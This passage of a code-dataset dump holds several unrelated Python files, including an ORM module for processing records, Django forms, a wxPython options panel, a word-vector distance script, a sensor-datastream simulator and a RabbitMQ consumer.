asc\n\nfrom idds.common import exceptions\nfrom idds.common.constants import ProcessingStatus, ProcessingLocking, GranularityType\nfrom idds.orm.base.session import read_session, transactional_session\nfrom idds.orm.base import models\n\n\ndef create_processing(transform_id, status=ProcessingStatus.New, locking=ProcessingLocking.Idle, submitter=None,\n granularity=None, granularity_type=GranularityType.File, expired_at=None, processing_metadata=None,\n substatus=ProcessingStatus.New, output_metadata=None):\n \"\"\"\n Create a processing.\n\n :param transform_id: Transform id.\n :param status: processing status.\n :param locking: processing locking.\n :param submitter: submitter name.\n :param granularity: Granularity size.\n :param granularity_type: Granularity type.\n :param expired_at: The datetime when it expires.\n :param processing_metadata: The metadata as json.\n\n :returns: processing.\n \"\"\"\n new_processing = models.Processing(transform_id=transform_id, status=status, substatus=substatus, locking=locking,\n submitter=submitter, granularity=granularity, granularity_type=granularity_type,\n expired_at=expired_at, processing_metadata=processing_metadata,\n output_metadata=output_metadata)\n return new_processing\n\n\n@transactional_session\ndef add_processing(transform_id, status=ProcessingStatus.New, locking=ProcessingLocking.Idle, submitter=None,\n granularity=None, granularity_type=GranularityType.File, expired_at=None, processing_metadata=None,\n output_metadata=None, session=None):\n \"\"\"\n Add a processing.\n\n :param transform_id: Transform id.\n :param status: processing status.\n :param locking: processing locking.\n :param submitter: submitter name.\n :param granularity: Granularity size.\n :param granularity_type: Granularity type.\n :param expired_at: The datetime when it expires.\n :param processing_metadata: The metadata as json.\n\n :raises DuplicatedObject: If a processing with the same name exists.\n :raises DatabaseException: If there is a database error.\n\n :returns: processing id.\n \"\"\"\n try:\n new_processing = create_processing(transform_id=transform_id, status=status, locking=locking, submitter=submitter,\n granularity=granularity, granularity_type=granularity_type, expired_at=expired_at,\n processing_metadata=processing_metadata, output_metadata=output_metadata)\n new_processing.save(session=session)\n proc_id = new_processing.processing_id\n return proc_id\n except IntegrityError as error:\n raise exceptions.DuplicatedObject('Processing already exists!: %s' % (error))\n except DatabaseError as error:\n raise exceptions.DatabaseException(error)\n\n\n@read_session\ndef get_processing(processing_id, to_json=False, session=None):\n \"\"\"\n Get processing or raise a NoObject exception.\n\n :param processing_id: Processing id.\n :param to_json: return json format.\n\n :param session: The database session in use.\n\n :raises NoObject: If no processing is founded.\n\n :returns: Processing.\n \"\"\"\n\n try:\n query = session.query(models.Processing)\\\n .filter_by(processing_id=processing_id)\n ret = query.first()\n if not ret:\n return None\n else:\n if to_json:\n return ret.to_dict_json()\n else:\n return ret.to_dict()\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('Processing(processing_id: %s) cannot be found: %s' %\n (processing_id, error))\n except Exception as error:\n raise error\n\n\n@read_session\ndef get_processings_by_transform_id(transform_id=None, to_json=False, session=None):\n \"\"\"\n Get processings or raise a NoObject exception.\n\n :param tranform_id: Transform id.\n :param session: The database session in use.\n\n :raises NoObject: If no processing is founded.\n\n :returns: Processings.\n \"\"\"\n\n try:\n query = session.query(models.Processing)\\\n .filter_by(transform_id=transform_id)\n query = query.order_by(asc(models.Processing.processing_id))\n\n ret = query.all()\n if not ret:\n return []\n else:\n items = []\n for t in ret:\n if to_json:\n items.append(t.to_dict_json())\n else:\n items.append(t.to_dict())\n return items\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('Processings(transform_id: %s) cannot be found: %s' %\n (transform_id, error))\n except Exception as error:\n raise error\n\n\n@read_session\ndef get_processings_by_status(status, period=None, locking=False, bulk_size=None, submitter=None, to_json=False, session=None):\n \"\"\"\n Get processing or raise a NoObject exception.\n\n :param status: Processing status of list of processing status.\n :param period: Time period in seconds.\n :param locking: Whether to retrieve only unlocked items.\n :param bulk_size: bulk size limitation.\n :param submitter: The submitter name.\n :param to_json: return json format.\n\n :param session: The database session in use.\n\n :raises NoObject: If no processing is founded.\n\n :returns: Processings.\n \"\"\"\n\n try:\n if not isinstance(status, (list, tuple)):\n status = [status]\n if len(status) == 1:\n status = [status[0], status[0]]\n\n query = session.query(models.Processing)\\\n .filter(models.Processing.status.in_(status))\\\n .filter(models.Processing.next_poll_at < datetime.datetime.utcnow())\n\n if period:\n query = query.filter(models.Processing.updated_at < datetime.datetime.utcnow() - datetime.timedelta(seconds=period))\n if locking:\n query = query.filter(models.Processing.locking == ProcessingLocking.Idle)\n if submitter:\n query = query.filter(models.Processing.submitter == submitter)\n\n query = query.order_by(asc(models.Processing.updated_at))\n\n if bulk_size:\n query = query.limit(bulk_size)\n\n tmp = query.all()\n rets = []\n if tmp:\n for t in tmp:\n if to_json:\n rets.append(t.to_dict_json())\n else:\n rets.append(t.to_dict())\n return rets\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('No processing attached with status (%s): %s' % (status, error))\n except Exception as error:\n raise error\n\n\n@transactional_session\ndef update_processing(processing_id, parameters, session=None):\n \"\"\"\n update a processing.\n\n :param processing_id: the transform id.\n :param parameters: A dictionary of parameters.\n :param session: The database session in use.\n\n :raises NoObject: If no content is founded.\n :raises DatabaseException: If there is a database error.\n\n \"\"\"\n try:\n\n parameters['updated_at'] = datetime.datetime.utcnow()\n if 'status' in parameters and parameters['status'] in [ProcessingStatus.Finished, ProcessingStatus.Failed,\n ProcessingStatus.Lost]:\n parameters['finished_at'] = datetime.datetime.utcnow()\n\n session.query(models.Processing).filter_by(processing_id=processing_id)\\\n .update(parameters, synchronize_session=False)\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('Processing %s cannot be found: %s' % (processing_id, error))\n\n\n@transactional_session\ndef delete_processing(processing_id=None, session=None):\n \"\"\"\n delete a processing.\n\n :param processing_id: The id of the processing.\n :param session: The database session in use.\n\n :raises NoObject: If no processing is founded.\n :raises DatabaseException: If there is a database error.\n \"\"\"\n try:\n session.query(models.Processing).filter_by(processing_id=processing_id).delete()\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('Processing %s cannot be found: %s' % (processing_id, error))\n\n\n@transactional_session\ndef clean_locking(time_period=3600, session=None):\n \"\"\"\n Clearn locking which is older than time period.\n\n :param time_period in seconds\n \"\"\"\n params = {'locking': 0}\n session.query(models.Processing).filter(models.Processing.locking == ProcessingLocking.Locking)\\\n .filter(models.Processing.updated_at < datetime.datetime.utcnow() - datetime.timedelta(seconds=time_period))\\\n .update(params, synchronize_session=False)\n\n\n@transactional_session\ndef clean_next_poll_at(status, session=None):\n \"\"\"\n Clearn next_poll_at.\n\n :param status: status of the processing\n \"\"\"\n if not isinstance(status, (list, tuple)):\n status = [status]\n if len(status) == 1:\n status = [status[0], status[0]]\n\n params = {'next_poll_at': datetime.datetime.utcnow()}\n session.query(models.Processing).filter(models.Processing.status.in_(status))\\\n .update(params, synchronize_session=False)\n","sub_path":"main/lib/idds/orm/processings.py","file_name":"processings.py","file_ext":"py","file_size_in_byte":10000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"35023503","text":"# help make your programs more organized and powerful\n# we work with a lot of different kinds of data and data structures\n# but not all data can be represented with strings, numbers, or booleans (like a person, phone, or computer)\n# with classes and objects, we can create our own data types with classes (overview/template of the data type)!\n\n# to create a class, we need to create another file\n# then we do class (class name): [indent] attributes\n#class Student:\n # we use this initialize function to map out student attributes\n# def __init__(self, name, major, gpa, is_on_probation):\n # now we assign some values\n# self.name = name\n# self.major = major\n# self.gpa = gpa\n# self.is_on_probation = is_on_probation\n\n# now we can call on the student.py class we created to make a student (object)\n# we first need to import the Student class from the other file\n\nfrom student import Student\n\nstudent1 = Student(\"Jim\", \"Business Administration\", 3.1, False)\nstudent2 = Student(\"Pam\", \"Art\", 2.5, True)\n\nprint(student1.name)\nprint(student2.gpa)\n","sub_path":"ClassesAndObjects.py","file_name":"ClassesAndObjects.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"82468729","text":"import gensim\nimport pickle\nimport csv\nimport sys\nimport gzip\nimport logging\nimport numpy\nfrom numpy import linalg\nfrom scipy.spatial import distance\nfrom gensim.models import KeyedVectors\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\ndef headToHead(word1,word2):\n newVec = []\n for i in range(0,len(word1)):\n newVec.append(word2[i]-word1[i])\n return newVec\n\n\nnostop = True\ninFile = sys.argv[2]\nif nostop:\n word_vectors_25 = KeyedVectors.load(\"vecs_25_nostop.kv\", mmap='r')\n word_vectors_30 = KeyedVectors.load(\"vecs_30_nostop.kv\", mmap='r')\n word_vectors_35 = KeyedVectors.load(\"vecs_35_nostop.kv\", mmap='r')\n word_vectors_40 = KeyedVectors.load(\"vecs_40_nostop.kv\", mmap='r')\n word_vectors_45 = KeyedVectors.load(\"vecs_45_nostop.kv\", mmap='r')\n word_vectors_50 = KeyedVectors.load(\"vecs_50_nostop.kv\", mmap='r')\n word_vectors_55 = KeyedVectors.load(\"vecs_55_nostop.kv\", mmap='r')\n word_vectors_60 = KeyedVectors.load(\"vecs_60_nostop.kv\", mmap='r')\n word_vectors_65 = KeyedVectors.load(\"vecs_65_nostop.kv\", mmap='r')\n word_vectors_70 = KeyedVectors.load(\"vecs_70_nostop.kv\", mmap='r')\n word_vectors_75 = KeyedVectors.load(\"vecs_75_nostop.kv\", mmap='r')\n \nvectorDictionary = {\"vecs_25_\":word_vectors_25, \"vecs_30_\":word_vectors_30,\"vecs_35_\":word_vectors_35,\n \"vecs_40_\":word_vectors_40, \"vecs_45_\":word_vectors_45,\"vecs_50_\":word_vectors_50,\n \"vecs_55_\":word_vectors_55, \"vecs_60_\":word_vectors_60,\"vecs_65_\":word_vectors_65,\n \"vecs_70_\":word_vectors_70, \"vecs_75_\":word_vectors_75}\n\ndistanceFunctionDictionary = {\"bray_curtis_\":distance.braycurtis,\"canberra_\":distance.canberra,\"chebyshev_\":distance.chebyshev,\n \"city_block_\":distance.cityblock, \"correlation_\":distance.correlation, \"cosine_\":distance.cosine,\n \"euclidian_\":distance.euclidean, \"mahalanobis_\":distance.mahalanobis,\"minowski_\":distance.minkowski,\n \"sqeuclidian_\":distance.sqeuclidean,\"head_to_head_\":headToHead,\"gensim_cosine_\":KeyedVectors.similarity}\n\nprint(\"Vectors Loaded\")\n\ndocuments = pickle.load(open(inFile,'rb'))\nfirstVector = False\nfor string, vector in vectorDictionary.items():\n word_vectors = vector\n fileDictionary = {}\n for functionName, function in distanceFunctionDictionary.items():\n fileArray = []\n absArray =[]\n vectorArray = []\n normArray = []\n if functionName == \"mahalanobis_\":\n while len(vectorArray) <= 1000:\n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n vector1 = word_vectors[documents[file][i]] \n if numpy.any(vectorArray != vector1):\n vectorArray.append(vector1)\n vector2 = word_vectors[documents[file][i+1]] \n if numpy.any(vectorArray != vector2):\n vectorArray.append(vector2)\n stacked = numpy.array(vectorArray).T\n iv = numpy.cov(stacked) \n for file in range(0,9999):\n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n vector1 = word_vectors[documents[file][i]] \n vector2 = word_vectors[documents[file][i+1]]\n fileArray.append(function(vector1,vector2,iv))\n elif functionName == \"gensim_cosine_\":\n for file in range(0,9999): \n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n fileArray.append((word_vectors.similarity(documents[file][i],documents[file][i+1])))\n absArray.append(abs(word_vectors.similarity(documents[file][i],documents[file][i+1]))) \n else:\n for file in range(0,9999): \n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n vector1 = word_vectors[documents[file][i]] \n vector2 = word_vectors[documents[file][i+1]] \n if functionName == \"head_to_head_\":\n if not firstVector:\n fileArray.append(word_vectors[documents[file][i]])\n firstVector == True\n vectorBetween = function(vector1,vector2)\n normArray.append(linalg.norm(vectorBetween))\n vectorArray.append(vectorBetween)\n else:\n fileArray.append(function(vector1,vector2))\n absArray.sort() \n fileArray.sort()\n if functionName == \"head_to_head_\":\n with open(functionName+'norm_'+string+\".txt\",\"w\") as f:\n for item in normArray:\n f.write(\"%s\\n\" % item)\n f.close()\n else:\n if functionName == \"gensim_cosine_\":\n with open(functionName+'abs_'+string+\".txt\",\"w\") as f:\n for item in absArray:\n f.write(\"%s\\n\" % item)\n f.close()\n with open(functionName+string+\".txt\",\"w\") as f:\n for item in fileArray:\n f.write(\"%s\\n\" % item)\n f.close()\n","sub_path":"files_input_data/NoNeed/distance_vector.py","file_name":"distance_vector.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"356488952","text":"from django import forms\n\nfrom .models import Group, Student\n\n\nclass GroupForm(forms.ModelForm):\n class Meta:\n model = Group\n fields = ['name']\n widgets = {\n 'name': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Group name'\n }\n ),\n }\n\n\nclass GroupUpdateForm(forms.ModelForm):\n unregistered_students = forms.ModelMultipleChoiceField(\n queryset=Student.objects.filter(group_id=None),\n required=False\n )\n\n class Meta:\n model = Group\n fields = ['name', 'headman', 'unregistered_students']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['headman'].queryset = self.instance.student_set.all()\n\n def save(self, *args, **kwargs):\n updated_group = super().save(*args, **kwargs)\n if self.cleaned_data['unregistered_students'].exists():\n for student in self.cleaned_data['unregistered_students']:\n student.group_id = updated_group\n student.save()\n return updated_group\n\n\nclass StudentForm(forms.ModelForm):\n class Meta:\n model = Student\n fields = [\n 'id',\n 'first_name',\n 'last_name',\n 'middle_name',\n 'birth_d',\n 'group_id'\n ]\n widgets = {\n 'birth_d': forms.DateInput(attrs={'placeholder': 'YYYY-MM-DD'}),\n # 'group_id': forms.Select\n }\n\n\nclass StudentUpdateForm(forms.ModelForm):\n class Meta:\n model = Student\n fields = '__all__'\n","sub_path":"students/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182519147","text":"\"\"\" OptionsPanel.py\r\n\r\n The OptionsPanel accepts the following information:\r\n\r\n isPrebooked\r\n readyAt\r\n deliverBy\r\n roundTrip -- can be disabled if desired.\r\n suppressDataMessage\r\n\"\"\"\r\nimport string\r\nimport wx\r\n#import wx.calendar\r\n\r\nInputPanel = Framework.get(\"shared.Editor\").InputPanel\r\nBooleanInputField = Framework.get(\"shared.Editor\").BooleanInputField\r\nDateTimeInputField = Framework.get(\"shared.Editor\").DateTimeInputField\r\nDateSelector = Framework.get(\"shared.Editor\").DateSelector\r\nDatePickerCtrl = Framework.get(\"shared.Editor\").DatePickerCtrl\r\nPopupInputField = Framework.get(\"shared.Editor\").PopupInputField\r\n\r\n#############################################################################\r\n\r\nclass OptionsPanel(InputPanel):\r\n \"\"\" The \"Options\" input panel.\r\n \"\"\"\r\n def __init__(self, parent, editor, showRoundTripField=False):\r\n \"\"\" Standard initialiser.\r\n\r\n 'editor' is the InputEditor this panel belongs to. If\r\n 'showRoundTripField' is set to False, the \"round trip\" checkbox is\r\n shown; this allows us to hide this field if it is not wanted.\r\n \"\"\"\r\n InputPanel.__init__(self, parent)\r\n self._editor = editor\r\n self._showRoundTripField = showRoundTripField\r\n\r\n # Define our input fields.\r\n\r\n self._prebookedField = BooleanInputField(self, \"Prebooked Job\")\r\n self._readyAtField = DateTimeInputField(self)\r\n self._deliverByField = DateTimeInputField(self)\r\n\r\n if showRoundTripField:\r\n self._roundTripField = BooleanInputField(self, \"Round Trip Job\")\r\n else:\r\n # Keep track of this value internally.\r\n self._roundTrip = False\r\n\r\n #self._suppressDataMessageField = \\\r\n # BooleanInputField(self, \"Suppress Data Message\")\r\n\r\n self._okToLeaveField = \\\r\n BooleanInputField(self, \"OK To Leave\")\r\n self._requiresPopField = \\\r\n BooleanInputField(self, \"Requires POP\")\r\n self._requiresPodField = \\\r\n BooleanInputField(self, \"Requires POD\")\r\n self._requiresPodWithCallBackField = \\\r\n BooleanInputField(self, \"Requires POD with Call Back\")\r\n\r\n # Lay out the contents of the input panel.\r\n\r\n self.addField(None, self._prebookedField, \"isPrebooked\")\r\n #self.addField(\"Ready At\", self._readyAtField, \"timeEntered\")\r\n self.addField(\"Ready At\", self._readyAtField, \"readyAt\")\r\n self.addField(\"Deliver By\", self._deliverByField, \"deliverBy\")\r\n\r\n self.addVerticalGap(10)\r\n\r\n self.addField(None, self._okToLeaveField, \"okToLeave\")\r\n self.addField(None, self._requiresPopField, \"requiresPop\")\r\n self.addField(None, self._requiresPodField, \"requiresPod\")\r\n self.addField(None, self._requiresPodWithCallBackField,\r\n\t\t\t \"requiresPodWithCallBack\")\r\n\r\n self.addVerticalGap(10)\r\n\r\n if showRoundTripField:\r\n self.addField(None, self._roundTripField, \"roundTrip\")\r\n\r\n #self.addField(None, self._suppressDataMessageField,\r\n # \"suppressDataMessage\")\r\n self.layout()\r\n\r\n\r\n def recordToPanel(self, rec):\r\n \"\"\" Override InputPanel.recordToPanel().\r\n\r\n If we are not showing the \"round trip\" field, we keep track of this\r\n value internally.\r\n \"\"\"\r\n InputPanel.recordToPanel(self, rec)\r\n if not self._showRoundTripField:\r\n self._roundTrip = rec.get(\"roundTrip\", False)\r\n\r\n\r\n def panelToRecord(self, rec):\r\n \"\"\" Override InputPanel.panelToRecord().\r\n\r\n If we are not showing the \"round trip\" field, we keep track of this\r\n value internally.\r\n \"\"\"\r\n InputPanel.panelToRecord(self, rec)\r\n if not self._showRoundTripField:\r\n rec['roundTrip'] = self._roundTrip\r\n\r\n\r\n def setFieldValue(self, field, value):\r\n \"\"\" Override InputPanel.setFieldValue().\r\n\r\n If we are not showing the \"round trip\" field, we keep track of this\r\n value internally.\r\n \"\"\"\r\n if not self._showRoundTripField and field == \"roundTrip\":\r\n self._roundTrip = value\r\n else:\r\n InputPanel.setFieldValue(self, field, value)\r\n\r\n","sub_path":"shared/Editor/jobInputPanels/OptionsPanel.py","file_name":"OptionsPanel.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112292710","text":"import numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\n\n# x is the positioning of the diagram\n# y is the energies of each orbital in a diagram\nx = np.array([1.00, 1.00, 1.00, 1.00, 1.00])\ny = np.array([0.90, 0.80, 0.75, 0.72, 0.60])\n\n# since we want horizonal lines, we'll have x-axis errorbars\nwidth = 0.2\nxerr = np.ones(len(x)) * width\n\nfig, ax = plt.subplots()\nax.errorbar(x, y, xerr=xerr, fmt='none', capsize=0, ecolor='black', barsabove=True)\nax.set_xbound(lower=0, upper=2)\nfig.savefig('diagram.pdf', bbox_inches='tight')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"301768076","text":"def longestIncreasingSubsequence(nums):\n n=len(nums)\n dp=[1 for i in range (len(nums))]\n for left in range(1,n):\n for current in range(left):\n if nums[left]>nums[current]:\n dp[left]=max(dp[left],dp[current]+1)\n maxvalue=-1\n for i in range(0,len(dp)):\n if dp[i]>maxvalue:\n maxvalue=dp[i]\n return maxvalue\n\n\nnums=[10,9,2,5,3,7,101,18]\nprint(longestIncreasingSubsequence(nums))","sub_path":"leetcodePractice/mediumProblems/longestIncreaingSubsequence.py","file_name":"longestIncreaingSubsequence.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"524944799","text":"# uncompyle6 version 3.5.0\r\n# Python bytecode 3.6 (3379)\r\n# Decompiled from: Python 3.6.8 (tags/v3.6.8:3c6b436a57, Dec 24 2018, 00:16:47) [MSC v.1916 64 bit (AMD64)]\r\n# Embedded file name: D:\\Projects\\d3ner\\ner\\process.py\r\n# Compiled at: 2018-06-19 19:17:05\r\n# Size of source mod 2**32: 549 bytes\r\nfrom ner import opt\r\n\r\ndef process(documents, config):\r\n \"\"\"\r\n Perform NER and NEN\r\n :param list documents: list of Document objects\r\n :param dict config: keys are ('ner' and 'nen') or 'ner_nen'\r\n :return: dict: {\"id\": }\r\n \"\"\"\r\n assert config.__class__.__name__ == 'dict', '\"config\" must be a dict.'\r\n res = {}\r\n ner_method = config.get(opt.NER_KEY)\r\n if ner_method:\r\n for d in documents:\r\n entities = ner_method.process(d)\r\n res[d.id] = entities\r\n\r\n return res","sub_path":"ner/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"394248100","text":"import pandas as pd\nfrom datastreams.datastreams import Datastreams\nfrom datamodels.wristband import *\nfrom datamodels.skeletal import *\nfrom datamodels.eye_tracking import *\n\n\nclass FileDatastreams(Datastreams):\n\n \"\"\"\n This class is a subclass of Datastreams, and takes the data stored in the csv-files and simulates the datastreams as if they were streamed in real-time by the devices.\n It does this by using an event loop, and scheduling data extraction at the appropriate time intervals (in the frequency of the data).\n The data that is extracted will be stored in the current_data variables as can be seen bellow.\n This data can be cleared, and is supposed to be cleared after it has been used to calculate the MMD Variables and sent to the dashboard (so it is cleared every half a second right now).\n \"\"\"\n\n # Arrays that holds all the currently generated data before it is cleared by the main loop\n current_acc_data = []\n current_bvp_data = []\n current_eda_data = []\n current_hr_data = []\n current_ibi_data = []\n current_temp_data = []\n current_eye_tracking_data = []\n current_skeleton_data = []\n\n # The actual data sources (i.e. the csv files)\n acc = None\n bvp = None\n eda = None\n hr = None\n ibi = None\n temp = None\n eye_tracking = None\n skeleton = None\n\n terminated = False\n loop = None\n\n file_path = \"./dataset\"\n\n def __init__(self, studentID, loop):\n \"\"\"\n studnetID is needed for reading the appropriate files. For example \"S001\".\n \"\"\"\n self.acc = pd.read_csv(\n self.file_path + \"/empatica/\" + studentID + \"/ACC.csv\"\n )\n self.bvp = pd.read_csv(\n self.file_path + \"/empatica/\" + studentID + \"/BVP.csv\"\n )\n self.eda = pd.read_csv(\n self.file_path + \"/empatica/\" + studentID + \"/EDA.csv\"\n )\n self.hr = pd.read_csv(\n self.file_path + \"/empatica/\" + studentID + \"/HR.csv\"\n )\n self.ibi = pd.read_csv(\n self.file_path + \"/empatica/\" + studentID + \"/IBI.csv\"\n )\n self.temp = pd.read_csv(\n self.file_path + \"/empatica/\" + studentID + \"/TEMP.csv\"\n )\n self.eye_tracking = pd.read_csv(\n self.file_path + \"/eye-tracking/ET-data-\" + studentID + \".csv\"\n )\n self.skeleton = pd.read_csv(\n self.file_path + \"/skeleton/skeleton-\" + studentID + \".csv\"\n )\n self.loop = loop\n\n def generate_frequency_datastream(self, data, time, current_data, loop):\n \"\"\"\n This methods populates a list with data from dataset with a constant frequency.\n It will call it self in a loop based on the frequency.\n \"\"\"\n if self.terminated:\n return\n freq = data.loc[0][0]\n current_data.append(data.loc[time])\n loop.call_later(\n 1 / freq, self.generate_frequency_datastream, data, time + 1, current_data, loop\n )\n\n def generate_eye_tracking_datastream(self, data, row, current_data, loop):\n \"\"\"\n This methods populates a list with data from eye_tracking dataset.\n It will call it self in a loop based on the end_times of the fixations.\n \"\"\"\n if self.terminated:\n return\n data_row = data.loc[row]\n end_time = data_row[2]\n next_end_time = data.loc[row + 1][2]\n current_data.append(data_row)\n loop.call_later(\n (next_end_time - end_time) /\n 1000, self.generate_eye_tracking_datastream, data, row + 1, current_data, loop\n )\n\n def generate_skeleton_datastream(self, data, row, current_data, loop):\n \"\"\"\n This methods populates a list with data from skeleton dataset with.\n It will call it self in a loop based on the timestamps of the dataset.\n \"\"\"\n if self.terminated:\n return\n row_counter = row\n time = data.loc[row][4]\n init_time = time\n while True:\n data_row = data.loc[row_counter]\n time = data_row[4]\n if time != init_time:\n break\n current_data.append(data_row)\n row_counter += 1\n loop.call_later(\n time - init_time, self.generate_skeleton_datastream, data, row_counter, current_data, loop\n )\n\n def start(self):\n \"\"\"\n Start all the generate-methods, which means that they will start generating data in a loop.\n \"\"\" \n self.loop.call_soon(\n self.generate_eye_tracking_datastream, self.eye_tracking, 1, self.current_eye_tracking_data, self.loop\n )\n self.loop.call_soon(\n self.generate_skeleton_datastream, self.skeleton, 1, self.current_skeleton_data, self.loop\n )\n self.loop.call_soon(\n self.generate_frequency_datastream, self.acc, 1, self.current_acc_data, self.loop\n )\n self.loop.call_soon(\n self.generate_frequency_datastream, self.bvp, 1, self.current_bvp_data, self.loop\n )\n self.loop.call_soon(\n self.generate_frequency_datastream, self.eda, 1, self.current_eda_data, self.loop\n )\n self.loop.call_soon(\n self.generate_frequency_datastream, self.hr, 1, self.current_hr_data, self.loop\n )\n self.loop.call_soon(\n self.generate_frequency_datastream, self.temp, 1, self.current_temp_data, self.loop\n )\n\n def terminate(self):\n \"\"\"\n Clear all the data and stop all the loops by setting terminated = True\n \"\"\"\n self.clear_current_data()\n self.terminated = True\n\n def clear_current_data(self):\n \"\"\"\n Clears all the current_data lists\n \"\"\"\n self.current_acc_data.clear()\n self.current_bvp_data.clear()\n self.current_eda_data.clear()\n self.current_hr_data.clear()\n self.current_ibi_data.clear()\n self.current_temp_data.clear()\n self.current_eye_tracking_data.clear()\n self.current_skeleton_data.clear()\n\n # ----------------------------------------------------------------------\n # The following methods are getters so that we get the data as data classes we have made, not the raw data rows.\n # See the Datastreams-superclass for more info\n\n def get_current_acc_data(self):\n return list(map(lambda row: AccDataPoint(row), self.current_acc_data))\n\n def get_current_bvp_data(self):\n return list(map(lambda row: BVPDataPoint(row), self.current_bvp_data))\n\n def get_current_eda_data(self):\n return list(map(lambda row: EDADataPoint(row), self.current_eda_data))\n\n def get_current_hr_data(self):\n return list(map(lambda row: HRDataPoint(row), self.current_hr_data))\n\n def get_current_ibi_data(self):\n return list(map(lambda row: IBIDataPoint(row), self.current_ibi_data))\n\n def get_current_temp_data(self):\n return list(map(lambda row: TempDataPoint(row), self.current_temp_data))\n\n def get_current_eye_tracking_data(self):\n return list(map(lambda row: EyeTrackingDataPoint(row), self.current_eye_tracking_data))\n\n def get_current_skeleton_data(self):\n return SkeletalNodeCollection(self.current_skeleton_data)\n\n def get_current_au_data(self):\n return []\n","sub_path":"backend/datastreams/file_datastreams.py","file_name":"file_datastreams.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"447825883","text":"import datetime\n\nfrom rest_framework.pagination import PageNumberPagination\n\nANONYMOUS_USER_ID = -1\n\nCORS_ORIGIN_ALLOW_ALL = True\n\n# REST FRAMEWORK ~ http://www.django-rest-framework.org/\n# ---------------------------------------------------------------------------------------------------------------------\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.BasicAuthentication',\n ),\n 'EXCEPTION_HANDLER': 'config.exceptions.custom_exception_handler',\n\n 'DEFAULT_THROTTLE_CLASSES': (\n 'config.throttling.UserHourRateThrottle',\n ),\n 'DEFAULT_THROTTLE_RATES': {\n 'second_anon': '1/second',\n 'hour_anon': '30/hour',\n 'day_anon': '500/day',\n 'second_free': '3/second',\n 'hour_free': '200/hour',\n 'day_free': '2000/day',\n }\n}\n\nfrom rest_framework.settings import reload_api_settings\nreload_api_settings(setting='REST_FRAMEWORK', value=REST_FRAMEWORK)\n","sub_path":"src/config/plugins/rest_framework.py","file_name":"rest_framework.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"28184028","text":"import sys\nimport time\n\nimport pika\n\n\ndef simple_callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n time.sleep(body.count(b'.'))\n print(\" [x] Done\")\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\ndef modify_callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n ch.queue_declare(queue='listen')\n time.sleep(body.count(b'.'))\n message = body + b' was modified'\n ch.basic_publish(exchange='',\n routing_key='listen',\n body=message)\n print(\" [x] Done\")\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\ndef receive(ch, callback):\n channel.queue_declare(queue='hello', durable=True, arguments={\"x-max-length\": 5, \"x-overflow\": \"drop-head\"})\n ch.basic_consume(callback,\n queue='hello')\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\n\nflag = sys.argv[1]\n\nif flag == 'receive':\n receive(channel, simple_callback)\n\nif flag == 'receive_n_modify':\n receive(channel, modify_callback)\n\n\n\n\n\n\n\n","sub_path":"rabbitmq/p2p_receive.py","file_name":"p2p_receive.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"205025981","text":"\"\"\"Resource definition for the analysis content type\n\"\"\"\n\nimport urllib\nimport colander\nimport deform.widget\n\nfrom persistent import Persistent\n\nfrom pyramid.httpexceptions import HTTPFound\n\nfrom substanced.content import content\nfrom substanced.folder import FolderKeyError\n\nfrom substanced.property import PropertySheet\nfrom substanced.schema 